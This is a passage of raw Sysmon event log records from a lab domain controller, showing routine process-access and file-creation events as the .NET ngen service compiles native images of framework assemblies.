319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.179{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:09.179{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924D-6005-5B04-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:09.116{59A5CD1D-924C-6005-5A04-00000000A301}3632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e30-0\System.Runtime.DurableInstancing.dll2021-01-18 13:51:09.116 10341000x80000000000000008656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.945{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.945{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6204-00000000A301}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.851{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.835{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.835{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6104-00000000A301}4712C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:10.757{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e5c-0\System.ServiceModel.Activation.dll2021-01-18 13:51:10.757 10341000x80000000000000008649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.241{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.241{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:10.226{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-924E-6005-6004-00000000A301}3676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.819{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.819{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6604-00000000A301}996C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.710{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.694{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.694{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6504-00000000A301}1372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:12.632{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b34-0\System.ServiceModel.Channels.dll2021-01-18 13:51:12.632 10341000x80000000000000008663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.319{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.304{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.304{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9250-6005-6404-00000000A301}2868C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:12.163{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9250-6005-6304-00000000A301}3692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 